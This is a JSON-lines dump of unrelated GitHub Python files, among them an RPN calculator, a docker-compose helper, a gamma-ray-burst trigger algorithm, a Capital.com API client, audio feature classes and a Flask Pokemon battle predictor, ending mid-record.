*IGNORE_PATTERNS)\n\n","repo_name":"TsaiTung-Chen/sftp-sync","sub_path":"tests/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9941993287","text":"#!/usr/bin/env python3\n\nimport operator\nimport readline\nimport logging\n\n\nhelp_message = \"\"\"\n'a': use last result output\n'q': quit\n\"\"\"\n\noperators = {\n\t'+': operator.add,\n\t'-': operator.sub,\n\t'*': operator.mul,\n\t'/': operator.truediv,\n\t'^': operator.pow,\n\t'%': operator.mod\n}\n\ndef help():\n\tprint(help_message)\n\ndef calculate(myarg, last_result = 0):\n\tstack = []\n\tfor token in myarg.split():\n\t\tif token == 'a':\n\t\t\tstack.append(last_result)\n\t\t\tcontinue\n\t\ttry:\n\t\t\ttoken = int(token)\n\t\t\tstack.append(token)\n\t\texcept ValueError:\n\t\t\tfunction = operators[token]\n\t\t\targ2 = stack.pop()\n\t\t\targ1 = stack.pop()\n\t\t\tresult = function(arg1, arg2)\n\t\t\tstack.append(result)\n\t\tlogging.info(stack)\n\t\t# print(stack)\n\tif len(stack) != 1:\n\t\traise TypeError(\"Too many parameters!\")\n\treturn stack.pop()\n\ndef main():\n\tlogging.basicConfig(filename=\"rpn.log\", level=logging.INFO)\n\tresult = 0\n\tfinished = False\n\twhile not finished:\n\t\tcmd = input(\"rpn calc ('h' for help)> \")\n\t\tif cmd == 'h':\n\t\t\thelp()\t\t\t\n\t\telif cmd == 'q':\n\t\t\treturn 0\n\t\telse:\n\t\t\tresult = calculate(cmd, result)\n\t\t\tprint(\"Result: \", result)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"ydtak/c4cs-f16-rpn","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26903384700","text":"from os import listdir\nfrom os.path import isfile, join\nfrom typing import Union\nfrom catcher.utils.logger import info\n\nfrom catcher.utils.module_utils import is_package_installed\n\n\nclass DockerCompose:\n \"\"\"\n :Docker-compose module:\n\n Will automatically run `docker-compose up -d` before your test and `down` after it if this\n module was enabled and you have `docker-compose.yml` file in your directory.\n\n :Enable this module:\n\n - run `pip install catcher[compose]`. It will installs all requirements, if they were not installed.\n\n \"\"\"\n def __init__(self, resources_dir) -> None:\n super().__init__()\n self._resources = resources_dir\n self._cmd = None\n self._options = {'--detach': True,\n 'SERVICE': \"\",\n '--no-deps': False,\n '--abort-on-container-exit': False,\n '--no-recreate': True,\n '--remove-orphans': False,\n '--always-recreate-deps': False,\n '--force-recreate': False,\n '--build': False,\n '--no-build': False,\n '--no-color': False,\n '--rmi': 'none',\n '--volumes': \"\",\n '--follow': False,\n '--timestamps': False,\n '--scale': {}\n }\n\n def up(self):\n \"\"\"\n Will run `docker-compose up -d` only in case docker-compose is installed locally\n and there is a docker-compose.yml file in resources directory\n \"\"\"\n compose = self.find_compose_file()\n if compose and is_package_installed('compose'):\n from compose.cli.main import TopLevelCommand, project_from_options\n info('Starting docker-compose. Please wait.')\n self._options['-f'] = join(self._resources, compose),\n self._cmd = TopLevelCommand(project_from_options(self._resources, self._options))\n self._cmd.up(self._options)\n\n def down(self):\n if self._cmd:\n self._cmd.down(self._options)\n\n def find_compose_file(self) -> Union[str, None]:\n \"\"\" find a docker compose file inside a resources directory \"\"\"\n if self._resources is None:\n return None\n files = [f for f in listdir(self._resources) if self._is_compose(f)]\n if files:\n return files[0]\n return None\n\n def _is_compose(self, file: str) -> bool:\n # use only default docker-compose.yml for now, will change it in future if needed.\n return isfile(join(self._resources, file)) and file == 'docker-compose.yml'\n","repo_name":"brunojensen/catcher","sub_path":"catcher/modules/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"33482995578","text":"import warnings\nimport logging\nfrom math import sqrt\n\nimport numpy as np\n\nKDETS = (\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"a\", \"b\")\nKRANGES = (\"0\", \"1\", \"2\")\n\n\ndef get_keys(ns=KDETS, rs=KRANGES):\n \"\"\"\n build lists like ['n1_r0', 'n3_r0']\n :param ns: sequence representing dets\n :param rs: sequence representing ranges\n :return: list of strings\n \"\"\"\n out = [\"n\" + str(i) + \"_r\" + j for i in ns for j in rs]\n return out\n\n\ndef filter_keys(ls, ns, rs=None):\n \"\"\"\n :param ls: list of string keys\n :param ns: detectors to keep\n :param rs: ranges to keep\n :return: filtered list of strings\n \"\"\"\n if rs is None:\n rs = [\"0\", \"1\", \"2\"]\n index_labels = set([i[1] for i in ls])\n range_labels = set([i[-1] for i in ls])\n\n out_index = index_labels.intersection(ns)\n out_range = range_labels.intersection(rs)\n return sorted(get_keys(out_index, out_range))\n\n\ndef trigger_mux(\n observations_df,\n trig,\n thresholds,\n stride,\n t_start=0.0,\n max_consecutive_zeros=10,\n **trig_params,\n):\n def reset_trigger(detector_key):\n trigs[detector_key] = trig(**trig_params)\n global_maximums[detector_key] = 0\n time_offsets[detector_key] = 0\n return True\n\n ndet = len(thresholds)\n\n mets_arr = observations_df[\"MET\"].to_numpy()\n saa_arr = observations_df[\"SAA\"].to_numpy()\n counts_arr = observations_df[get_keys()].to_numpy()\n det_keys = [(i, k) for i, k in enumerate(get_keys()) if np.isfinite(thresholds[i])]\n det_indeces, det_names = zip(*det_keys)\n\n consecutive_zeros = np.array([0 for _ in range(ndet)])\n global_maximums = np.array([0.0 for _ in range(ndet)])\n time_offsets = np.array([0 for _ in range(ndet)])\n trigs = [trig(**trig_params) for _ in range(ndet)]\n trig_registry = []\n\n nrows = len(mets_arr)\n t = int(t_start * nrows)\n while t < nrows:\n print(end=\"\\r%6.2f %%\" % (t / (nrows - 1) * 100))\n\n # deals with SAA passages\n if saa_arr[t]:\n for n, _ in det_keys:\n reset_trigger(n)\n consecutive_zeros[n] = 0\n\n try:\n next_out, *_ = np.where(saa_arr[t:] == 0)[0]\n except ValueError:\n # deals with the possibility of observations ending in saa\n if not np.all(saa_arr[t:]):\n raise\n t = nrows\n else:\n t += next_out\n continue\n\n # deals with occasionally detectors turning off at same time\n elif not np.any(counts_arr[t]):\n for n, _ in det_keys:\n warnings.warn(\n f\"All detectors seems to be off. \"\n f\"Resetting all triggers. \"\n f\"MET: {mets_arr[t]}\"\n )\n reset_trigger(n)\n consecutive_zeros[n] = 0\n try:\n next_out, *_ = np.where(np.all(counts_arr[t:], axis=1))[0]\n except ValueError:\n # deals with the possibility of signal never coming up again\n if not np.all(counts_arr[t:]):\n raise\n t = nrows\n else:\n t += next_out\n continue\n\n for n, det_key in zip(det_indeces, det_names):\n x_t = counts_arr[t, n]\n if x_t <= 0:\n consecutive_zeros[n] += 1\n else:\n consecutive_zeros[n] = 0\n\n if consecutive_zeros[n] > max_consecutive_zeros:\n # data may contains segments in which the counts of some detector\n # is constantly zero because the detector is turned off.\n # this happens most often with sun-facing detectors.\n # if we pass too much zero data to the trigger, they will\n # pollute the background estimate, possibly causing\n # false detection. when we detect this, we restart the trigger.\n reset_trigger(n)\n warnings.warn(\n f\"Found a bad data segment for detector {det_key}. \"\n f\"Resetting the corresponding trigger. \"\n f\"MET: {mets_arr[t]}\"\n )\n continue\n\n try:\n global_max, time_offset = trigs[n].step(x_t)\n except ValueError:\n raise ValueError(\n f\"Corrupted background estimate over {det_key}. \"\n f\"Resetting this trigger.\"\n f\"MET: {mets_arr[t]}\"\n )\n global_maximums[n] = global_max\n time_offsets[n] = time_offset\n\n # trigger condition.\n if len(np.unique(np.floor((np.argwhere(global_maximums > thresholds).T + 1) / 3))) > 1:\n print(\", found a trigger.\")\n logging.info(\"\\n--------\")\n logging.info(\"New trigger [key: {:3d}]\".format(len(trig_registry)))\n trig_met = mets_arr[t]\n logging.info(\"MET: {}.\".format(trig_met))\n logging.info(\"{:.1f}% done!\".format(100 * t / nrows))\n logging.info(\"Iteration number: {}\".format(t))\n trig_entry = [len(trig_registry), trig_met]\n for i, (key, to, gm) in enumerate(\n zip(get_keys(), time_offsets, global_maximums)\n ):\n if gm > thresholds[i]:\n logging.info(\n \"det_name: {}, time-offset: {:3d}, significance {:.2f}\".format(\n key, -to, gm\n )\n )\n trig_entry.append((key, to, sqrt(2 * gm)))\n trig_registry.append(tuple(trig_entry))\n for n, _ in det_keys:\n reset_trigger(n)\n consecutive_zeros[n] = 0\n t += stride\n else:\n t += 1\n return trig_registry\n","repo_name":"peppedilillo/grb-trigger-algorithms","sub_path":"grb-trigger-algorithms/real_data/trigger_multiplexer.py","file_name":"trigger_multiplexer.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73548773859","text":"import logging\nimport sys\nimport pydevd\n\n__author__ = 'ehongka'\n\n\ndef main():\n \"\"\"main function\"\"\"\n print(\"start\")\n logging.basicConfig(level=logging.DEBUG)\n logging.info(\"logging is working\")\n print(\"end\")\n\n\nif __name__ == \"__main__\":\n print(\"111\")\n pydevd.settrace('142.133.110.134', port=51234)\n main()\n","repo_name":"hongkailiu/test-python","sub_path":"main/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7613709431","text":"# -*- coding: utf-8 -*-\n\"\"\"Capital.com API wrapper for capitals REST-V10 API.\"\"\"\n\nimport json\nimport requests\nimport logging\nfrom .exceptions import V10Error\n\nITER_LINES_CHUNKSIZE = 60\n\nTRADING_ENVIRONMENTS = {\n \"demo\": {\n \"stream\": 'wss://api-streaming-capital.backend-capital.com/connect',\n \"api\": 'https://demo-api-capital.backend-capital.com/'\n },\n \"live\": {\n \"stream\": 'wss://api-streaming-capital.backend-capital.com/connect',\n \"api\": 'https://api-capital.backend-capital.com'\n }\n}\n\nDEFAULT_HEADERS = {\n \"Accept-Encoding\": \"gzip, deflate\"\n}\n\nlogger = logging.getLogger(__name__)\n\n\nclass API(object):\n r\"\"\"API - class to handle APIRequests objects to access API endpoints.\n \"\"\"\n\n def __init__(self, apikey, environment=\"demo\",\n headers=None, request_params=None):\n \"\"\"Instantiate an instance of CapitalcomPy's API wrapper.\n\n Parameters\n ----------\n\n environment : string\n Provide the environment for capital.com's REST api. Valid values:\n 'demo' or 'live'. Default: 'demo'.\n\n headers : dict (optional)\n Provide request headers to be set for a request.\n For all requests this should be:\n\n X-SECURITY-TOKEN : string\n Provide a valid account token\n\n CST : string\n Provide a valid session authorization token\n\n Note X-SECURITY-TOKEN and CST are provided by the Capital.com API based on the\n call to the session endpoint. These fields are added to the headers of the API object\n after successfull call to the getEncryptionKey and session calls.\n\n \"\"\"\n logger.info(\"setting up API-client for environment %s\", environment)\n try:\n TRADING_ENVIRONMENTS[environment]\n\n except KeyError as err: # noqa F841\n logger.error(\"unkown environment %s\", environment)\n raise KeyError(\"Unknown environment: {}\".format(environment))\n\n else:\n self.environment = environment\n\n self.apikey = apikey\n self.client = requests.Session()\n self.client.stream = False\n self._request_params = request_params if request_params else {}\n\n # personal token authentication\n if self.apikey:\n self.client.headers['X-CAP-API-KEY'] = self.apikey\n self.client.headers['Content-Type'] = 'application/json'\n\n self.client.headers.update(DEFAULT_HEADERS)\n\n if headers:\n self.client.headers.update(headers)\n logger.info(\"applying headers %s\", \",\".join(headers.keys()))\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def close(self):\n \"\"\"close.\n\n explicit close of the session.\n \"\"\"\n self.client.close()\n\n @property\n def request_params(self):\n \"\"\"request_params property.\"\"\"\n return self._request_params\n\n def __request(self, method, url, request_args, headers=None, stream=False):\n \"\"\"__request.\n\n make the actual request. This method is called by the\n request method in case of 'regular' API-calls. Or indirectly by\n the__stream_request method if it concerns a 'streaming' call.\n \"\"\"\n func = getattr(self.client, method)\n headers = headers if headers else {}\n response = None\n try:\n logger.info(\"performing request %s\", url)\n response = func(url, stream=stream, headers=headers,\n **request_args)\n except requests.RequestException as err:\n logger.error(\"request %s failed [%s]\", url, err)\n raise err\n\n # Handle error responses\n if response.status_code >= 400:\n \"\"\" Prices are retrieved using a generator that retrieves the candles.\n Sometimes individual calls yield a response code of 400 with and errorcode.\n We don't want the calls to stop and just continue to get the next prices. \n This is achieved by setting the status code to 200.\n \"\"\"\n if response.content.decode('utf-8') == '{\"errorCode\":\"error.prices.not-found\"}':\n response.status_code = 200\n return response\n\n else:\n logger.error(\"request %s failed [%d,%s]\",\n url,\n response.status_code,\n response.content.decode('utf-8'))\n raise V10Error(response.status_code,\n response.content.decode('utf-8'))\n return response\n\n def __stream_request(self, method, url, request_args, headers=None):\n \"\"\"__stream_request.\n\n make a 'stream' request. This method is called by\n the 'request' method after it has determined which\n call applies: regular or streaming.\n \"\"\"\n headers = headers if headers else {}\n response = self.__request(method, url, request_args,\n headers=headers, stream=True)\n lines = response.iter_lines(ITER_LINES_CHUNKSIZE)\n for line in lines:\n if line:\n data = json.loads(line.decode(\"utf-8\"))\n yield data\n\n def request(self, endpoint):\n \"\"\"Perform a request for the APIRequest instance 'endpoint'.\n\n Parameters\n ----------\n endpoint : APIRequest\n The endpoint parameter contains an instance of an APIRequest\n containing the endpoint, method and optionally other parameters\n or body data.\n\n Raises\n ------\n V10Error in case of HTTP response code >= 400\n \"\"\"\n method = endpoint.method\n method = method.lower()\n params = None\n try:\n params = getattr(endpoint, \"params\")\n except AttributeError:\n # request does not have params\n params = {}\n\n headers = {}\n if hasattr(endpoint, \"HEADERS\"):\n headers = getattr(endpoint, \"HEADERS\")\n\n request_args = {}\n if method == 'get':\n request_args['params'] = params\n elif hasattr(endpoint, \"data\") and endpoint.data:\n request_args['data'] = endpoint.data\n #request_args = json.loads(endpoint.data)\n\n\n # if any parameter for request then merge them\n #request_args.update(self._request_params)\n\n # which API to access ?\n if not (hasattr(endpoint, \"STREAM\") and\n getattr(endpoint, \"STREAM\") is True):\n url = \"{}/{}\".format(\n TRADING_ENVIRONMENTS[self.environment][\"api\"],\n endpoint)\n\n response = self.__request(method, url,\n request_args, headers=headers)\n content = response.content.decode('utf-8')\n content = json.loads(content)\n\n # update endpoint\n endpoint.response = content\n endpoint.status_code = response.status_code\n\n if endpoint.ENDPOINT == \"api/v1/session\" :\n if endpoint.status_code == endpoint.expected_status:\n del self.client.headers['X-CAP-API-KEY']\n self.client.headers['X-SECURITY-TOKEN'] = response.headers['X-SECURITY-TOKEN']\n self.client.headers['CST'] = response.headers['CST']\n\n return content\n\n else:\n url = \"{}/{}\".format(\n TRADING_ENVIRONMENTS[self.environment][\"stream\"],\n endpoint)\n endpoint.response = self.__stream_request(method,\n url,\n request_args,\n headers=headers)\n return endpoint.response\n","repo_name":"3sr3v3r/capitalcom-getdata","sub_path":"capitalcompy/capitalcompy.py","file_name":"capitalcompy.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35339582469","text":"\"\"\" \n This is package contains several algorithms for Tempo Analysis and Beat tracking in Python.\n\n Currently this package contains the functions necessary to estimate the tempo.\n\n \"\"\"\nimport os\nimport scipy as sp\nimport scikits.audiolab as al\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as ml\nfrom matplotlib.ticker import FuncFormatter, FixedLocator, MaxNLocator, MultipleLocator\nimport exceptions\n\n \nclass Signal(object):\n \"\"\"\n This class models a time-varying signal (either real or complex). \n \n The information is stored as a Numpy array.\n \n The following operations are currently supported: loading the data from a file, plotting the data, and playing the data. Depending of the array dimension different operations are available.\n \n \"\"\"\n# data = DataClass(test_nd_ndarray, sp.zeros((0,)))\n# fs = DataClass(test_positive, 1)\n \n default_xlabel = \"Time (s)\"\n default_ylabel = \"Signal\"\n\n # Number of time samples. Equivalent to the last dimension of self.data.\t\n @property\n def num_samples(self):\n return self.data.shape[-1]\n\n # Period between adjacent frames in seconds:\n @property\n def period(self):\n return 1.0/self.fs\n\n # Duration in signals\n @property\n def duration(self):\n return self.num_samples*self.period\n \n def __init__(self, data = sp.zeros((0,)), fs=1):\n \"\"\"The signal can be initialized by a numpy uni-dimensional array. \"\"\"\n\n self.data = data\n self.fs = fs\n self.name = \"time signal\"\n \n def plot(self):\n \"Plots the signal using MatPlotLib.\"\n t = sp.linspace(0,(sp.size(self.data)-1.0)/self.fs,sp.size(self.data)) \n ax = plt.plot(t,self.data)\n plt.xlabel(self.default_xlabel)\n plt.ylabel(self.default_ylabel)\n return plt.gca()\n \n def __add__(self, other):\n \"\"\"Add overload\"\"\"\n if(other.fs == self.fs):\n aux = self\n aux.data = self.data+other.data\n return aux\n raise TypeError\n \nclass AudioSignal(Signal):\n\n def __init__(self,data=sp.zeros((0,)),fs=0,filename=\"\",small_footprint=False, \n mix_opt='l'):\n \"\"\" \"\"\"\n super(AudioSignal,self).__init__(data, fs)\n if(filename != \"\"):\n self.load_audiofile(filename, small_footprint, mix_opt)\n\n def load_audiofile(self, filename, small_footprint=False, mix_opt='l'):\n \"\"\"Method description\"\"\"\n snd_file = al.Sndfile(filename,'r')\n aux_file = al.Sndfile(filename,'r')\n name_ext = os.path.basename(filename)\n name = os.path.splitext(name_ext)[0]\n self.encoding = snd_file.format.encoding\n self.file_format = snd_file.format.file_format\n self.filename = name\n self.fs = snd_file.samplerate\n if small_footprint and self.encoding=='pcm16':\n # Reading as flot and converting to int16: avoids bug for stereo files.\n temp_data = snd_file.read_frames(snd_file.nframes)\n temp_data = sp.array(temp_data*32768.0, dtype=sp.int16)\n else:\n temp_data = snd_file.read_frames(snd_file.nframes)\n if temp_data.ndim != 1: # For multi-channel audio, only one channel is loaded\n if mix_opt == 'l':\n temp_data = temp_data[:,0] \n elif mix_opt == 'r':\n temp_data = temp_data[:,1] \n elif mix_opt == 'dm':\n temp_data = (temp_data[:,0] + temp_data[:,1]) / 2.0\n else:\n raise ValueError(\"Invalid channel selection.\")\n self.data = temp_data\n snd_file.close()\n \n def play(self):\n al.play(self.data,self.fs)\n \n\nclass Feature(Signal):\n \"\"\" This class serves as a base class for the storage of features of a Signal.\n \n The features are stored as a 2-D Numpy array inside the data member of this class.\n The data member has a decorator in order to ensure that its type.\n \"\"\"\n # Number of features. Equivalent to the number of lines in self.data.\t\n @property\n def num_features(self):\n if self.data.ndim == 1:\n return 1\n return self.data.shape[0]\n def __init__(self,data=sp.zeros((0,0)), fs=1, signal=None, time_index=None, \n feature_index=None, name=\"unkown\", feat_axis_label = \"Feature number\"):\n \"\"\"Init method. Sets the data and sampling rate of the Feature.\"\"\"\n self.data = data\n self.fs = fs\n self.signal = signal\n self.feat_axis_label = feat_axis_label\n self.time_axis_unit = \"Time (s)\"\n self.name = name\n # Creating time index:\n if(time_index is None):\n self.time_index = sp.arange(self.num_samples)/float(self.fs)\n else:\n if(time_index.shape[0]!=self.num_samples):\n raise ValueError(\n \"Time indices must have the same length as self.num_samples.\")\n self.time_index = time_index\n # Creating frequency index:\n if(feature_index is None):\n self.feature_index = sp.arange(self.num_features)\n else:\n# if(feature_index.shape[0]!=self.num_features):\n# raise ValueError(\n# \"Feature indices must have the same length as self.num_feats.\")\n self.feature_index = feature_index\n \n def getFrame(self, frame):\n \"\"\" Returns all feature-values for a given frame. Frame can be an integer type or\n floating point precision. If integer it is assumed to be the frame number, if \n floating point it is assumed to be a time in seconds.\n \"\"\" \n if isinstance(frame, int):\n frame = frame\n elif isinstance(frame, float):\n frame = round(frame/self.fs)\n else:\n raise TypeError(\"Frame must be an integer or a float.\")\n return self.data[:,frame]\n \n def getSignal(self, feature_number):\n \"\"\" Returns a time varying onde-dimensional signal containing a reference to the\n chosen feature number. \n \"\"\"\n if self.data.ndim==1:\n return self\n return Signal(self.data[feature_number, :], self.fs)\n \n def plot(self, transform = None, positive_only = True):\n \"\"\" Plots all features.\"\"\" \n if transform == None: \n transform = lambda x: x\n if(positive_only):\n ind = self.feature_index>=0\n else:\n ind = sp.arange(self.feature_index.shape[0])\n fig = plt.imshow(transform(self.data[ind, :]), origin = 'lower', \n aspect = 'auto', interpolation='nearest')\n ax = plt.gca()\n \n def feat_formatter(x, pos):\n 'The two args are the value and tick position'\n x_int = (round(x))\n x_int = sp.maximum(x_int, 0.0)\n x_int = sp.minimum((self.feature_index[ind]).size-1, x_int)\n x_int = abs(x_int)\n return '%3.2f' % (self.feature_index[ind][x_int]/1000.0)\n \n def time_formatter(x, pos):\n 'The two args are the value and tick position'\n x_int = (round(x))\n x_int = sp.maximum(x_int, 0.0)\n x_int = sp.minimum((self.time_index).size-1, x_int)\n x_int = abs(x_int)\n return '%3.0g' % (round(self.time_index[x_int]*100)/100.0)\n \n feat_format = FuncFormatter(feat_formatter)\n time_format = FuncFormatter(time_formatter)\n ax.yaxis.set_major_formatter(feat_format)\n ax.xaxis.set_major_formatter(time_format)\n# xLoc = MultipleLocator(base=10.0)\n# yLoc = MultipleLocator(base=10.0)\n# xLoc.set_scientific(True)\n# yLoc.set_scientific(True)\n# ax.xaxis.set_major_locator(xLoc)\n# ax.yaxis.set_major_locator(yLoc)\n# xLoc.refresh()\n# yLoc.refresh()\n plt.xlabel(self.time_axis_unit)\n plt.ylabel(self.feat_axis_label)\n \nclass MusicData(object):\n \"\"\" This object contains all data and meta-data related to a music signal.\"\"\"\n\n \nclass Similarity(Feature):\n \"\"\"\n This class models the similarity function of a audio signal. The similarity function\n has a value exhibits the self-similarity of an audio signal for different time\n instants.\n \"\"\"\n default_xlabel = \"BPM\"\n default_ylabel = \"Similarity\"\n def __init__(self, data = None, lag = None, time=0, feat_id=None):\n \"\"\" TODO Documentation\"\"\"\n self.default_xlabel = \"BPM (s)\"\n self.default_ylabel = \"Signal\"\n if data is None: \n data = sp.zeros((0,))\n if lag is None:\n lag = sp.zeros((0,))\n if feat_id is None:\n feat_id = 'unknown'\n self.data = data \n self.lag = lag\n self.time = time\n self.feat_id = [feat_id]\n \n def plot(self, xlabel=default_xlabel, ylabel=default_ylabel):\n \"\"\" Plots the periodicity.\"\"\"\n if self.data.ndim == 1:\n fig = plt.plot(self.bpm, self.data)\n elif self.data.ndim == 2:\n for x in self.data:\n fig = plt.plot(self.bpm, x)\n else:\n raise AttributeError(\"Data must be either a 1-D or 2-D numpy array.\")\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n return fig\n \n def __add__(self, other):\n \"\"\" Adds two similarity vectors.\"\"\"\n if self.data.shape != other.data.shape:\n raise ValueError(\"The similarities must have the same dimension.\")\n if sp.all(self.lag == other.lag) and sp.all(self.time == other.time):\n return Similarity(self.data+other.data, self.lag, self.time)\n else:\n raise ValueError(\"Both Similairties must have the same lag and time stamps.\")\n \n def __iadd__(self, other):\n \"\"\" Adds two similarity vectors.\"\"\"\n if self.data.shape != other.data.shape:\n raise ValueError(\"The similarities must have the same dimension.\")\n if sp.all(self.lag == other.lag) and sp.all(self.time == other.time):\n self.data += other.data\n return self\n else:\n raise ValueError(\"Both Similairties must have the same lag and time stamps.\")\n \n def aggregate_feat(self, other):\n if self.data.shape[:2] != other.data.shape[:2]:\n raise ValueError(\"The similarities must have the same dimension.\")\n if sp.all(self.lag == other.lag) and sp.all(self.time == other.time):\n self.data, temp_data = sp.atleast_3d(self.data, other.data)\n self.data = sp.concatenate((self.data, temp_data), axis=2)\n self.feat_id += other.feat_id\n else:\n raise ValueError(\"Both Similairties must have the same lag and time stamps.\") \n\n @property\n def bpm(self):\n \"\"\"Get the bpm for each similarity element.\"\"\"\n return 60.0/self.lag\n \n def getFeatSim(self, ind):\n if self.data.ndim == 3:\n return Similarity(self.data[:,:,ind], self.lag, self.time)\n else:\n return self\n \n @property\n def num_features(self):\n if self.data.ndim == 3:\n return self.data.shape[-1]\n return 1\n \n @property\n def period(self):\n return self.lag[1] - self.lag[0]\n\nif __name__ == \"__main__\":\n pass","repo_name":"lonnes/RhythmicAnalysis","sub_path":"ra/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":11500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"22468653477","text":"import turtle\nsonic1=turtle.Pen()\nsonic2=turtle.Pen()\nsonic3=turtle.Pen()\nsonic4=turtle.Pen()\ndef fork1():\n sonic1.fd(100)\n sonic1.left(90)\n sonic1.fd(100)\n sonic1.right(90)\n sonic1.fd(50)\ndef fork2():\n sonic2.fd(100)\n sonic2.fd(10)\n sonic2.left(90)\n sonic2.fd(30)\n sonic2.right(90)\n sonic2.fd(45)\ndef fork3():\n sonic3.fd(100)\n sonic3.right(90)\n sonic3.fd(100)\n sonic3.left(90)\n sonic3.fd(50)\ndef fork4():\n sonic4.fd(100)\n sonic4.fd(10)\n sonic4.right(90)\n sonic4.fd(30)\n sonic4.left(90)\n sonic4.fd(45)\n\n \ndef pitchfork():\n fork1()\n fork2()\n fork3()\n fork4()\n","repo_name":"u-lee-hsu/Program__for_test","sub_path":"Python for kids/pitchfork.py","file_name":"pitchfork.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28729160417","text":"# ========================================================================================================\n# Pokemon Battle\n# ========================================================================================================\nfrom flask import Flask, render_template, request, redirect, url_for, jsonify, send_from_directory, abort\nimport requests\nimport joblib\nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport os\nimport random\n\napp = Flask(__name__, static_url_path='')\n\n@app.route('/')\ndef welcome():\n return render_template('welcome.html')\n\n@app.route('/hasil', methods = ['GET', 'POST'])\ndef hasil():\n df = pd.read_csv('pokemon.csv', index_col=0)\n \n pokemon1 = request.form['nama1']\n pokemon2 = request.form['nama2']\n\n if pokemon1.lower().title() in df['Name'].values:\n if pokemon2.lower().title() in df['Name'].values:\n feature = []\n dfPoke1 = df[df['Name'] == pokemon1.lower().title()]\n dfPoke2 = df[df['Name'] == pokemon2.lower().title()]\n\n feature.append(dfPoke1['HP'].values[0])\n feature.append(dfPoke2['HP'].values[0])\n feature.append(dfPoke1['Attack'].values[0])\n feature.append(dfPoke2['Attack'].values[0])\n feature.append(dfPoke1['Defense'].values[0])\n feature.append(dfPoke2['Defense'].values[0])\n feature.append(dfPoke1['Sp. Atk'].values[0])\n feature.append(dfPoke2['Sp. Atk'].values[0])\n feature.append(dfPoke1['Sp. Def'].values[0])\n feature.append(dfPoke2['Sp. Def'].values[0])\n feature.append(dfPoke1['Speed'].values[0])\n feature.append(dfPoke2['Speed'].values[0])\n \n prediction = int(model.predict([feature])[0])\n if prediction == 0:\n prediction = pokemon1\n elif prediction == 1:\n prediction = pokemon2\n probability = round(max(model.predict_proba([feature])[0]) * 100, 2)\n\n url = 'https://pokeapi.co/api/v2/pokemon/'\n dataPokemon1 = requests.get(url+pokemon1)\n dataPokemon2 = requests.get(url+pokemon2)\n\n plt.figure(figsize = (12,3))\n plt.style.use('ggplot')\n\n plt.subplot(161)\n plt.title('HP', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['HP'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['HP'].values[0], color = 'g')\n\n plt.subplot(162)\n plt.title('Attack', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Attack'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Attack'].values[0], color = 'g')\n\n plt.subplot(163)\n plt.title('Defense', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Defense'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Defense'].values[0], color = 'g')\n\n plt.subplot(164)\n plt.title('Special Attack', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Sp. Atk'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Sp. Atk'].values[0], color = 'g')\n\n plt.subplot(165)\n plt.title('Special Defense', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Sp. Def'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Sp. Def'].values[0], color = 'g')\n\n plt.subplot(166)\n plt.title('Speed', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Speed'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Speed'].values[0], color = 'g')\n\n xy = random.randint(10000, 9999999)\n listplot = os.listdir('./storage')\n aa = str(len(listplot) + 1) + '_' + str(xy) + '.jpg'\n\n plt.savefig('storage/%s' % aa, Transparent=True)\n\n return render_template('hasil.html', dataPokemon1 = dataPokemon1, dataPokemon2 = dataPokemon2, prediction = prediction, proba = probability, zz=aa)\n else:\n return render_template('error.html')\n else:\n return render_template('error.html')\n \n@app.route('/plotku/') \ndef plotku(yy):\n return send_from_directory('storage', yy)\n\n@app.errorhandler(404)\ndef notFound(error): \n return render_template('error.html'), 404\n\nif __name__ == '__main__':\n model = joblib.load('ML.joblib')\n app.run(debug = True)","repo_name":"albert-rian/Pokemon_Battle","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71673751140","text":"import glob\nimport os\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n\ndef split_for_slicling(image: np.array, row_number: int = 9, col_number: int = 9) -> 